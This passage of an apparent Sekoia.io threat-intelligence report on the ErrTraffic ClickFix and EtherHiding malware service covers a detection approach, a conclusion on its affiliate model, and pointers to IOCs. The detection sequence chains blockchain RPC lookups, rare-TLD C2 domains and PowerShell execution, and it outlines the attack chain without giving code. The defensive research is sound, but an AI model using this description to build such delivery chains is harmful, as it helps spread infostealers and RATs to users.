  condition: selection

This method relies on PowerShell ScriptBlockText logging. However, this logging level is not enabled by default and the resulting data is not systematically collected. A high-confidence alternative involves monitoring for a specific behavioral sequence on a single asset:

1. Initial connection: A network request to the blockchain services (e.g. Polygon, Quiknode, etc.) used by the EtherHiding technique implemented in ErrTraffic.
2. Redirect / C2 connection: A subsequent connection to a domain with a rare TLD known to be used by ErrTraffic clusters, such as .beer, .monster, etc.
3. Execution: The immediate launch of a PowerShell process following these network events.

By correlating this specific chain of events, it is possible to accurately detect the ErrTraffic infection behavior without relying solely on advanced log levels or static command signatures.

Conclusion

Analysis of ErrTraffic demonstrates a widespread malicious framework, leveraging the ClickFix social engineering tactic and the EtherHiding technique, mostly deployed on compromised WordPress sites alongside malicious websites impersonating AI platforms. Because the ErrTraffic framework is modular, it adapts to multiple initial access vectors and features suitable Traffic Distribution System capabilities.

Since emerging in December 2025, its rapid expansion reflects growing adoption and a well established Malware-as-a-Service business within the cybercriminal ecosystem.

We assess with high confidence that the “Beer” cluster is related to the ErrTraffic MaaS offering. Affiliates therefore access a turnkey ClickFix framework to deploy within their malware distribution infrastructure. For this cluster, we assess that each affiliate campaign uses a distinct smart contract. Continuous monitoring of their contract addresses suggests steady onboarding of new affiliates into the MaaS platform, each distributing various malware families, including infostealers, RATs and loaders.

By leveraging the prominent ClickFix tactic and broadly exploiting vulnerable WordPress sites or impersonating well-known AI platforms, ErrTraffic affiliates have affected numerous users worldwide.

To protect our customers from ErrTraffic and other ClickFix-based frameworks (ClearFake, IClickFix), Sekoia.io analysts will continue proactive monitoring of these threats and tracking their C2 infrastructure.

Thank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by clicking here. You can also contact us at tdr[at]sekoia.io for further discussions or future IOCs.

IOCs

The indicators and YARA rule are available in CSV format with additional metadata in the SEKOIA-IO/Community GitHub repository.

More IoCs associated with these ErrTraffic clusters are available in Sekoia.io CTI feed.

Feel free to read other Sekoia.io TDR (Threat Detection & Research) analysis here:

• Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic
• Phishing Campaigns “I Paid Twice” Targeting Booking.com Hotels and Customers
• ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery

Share this post: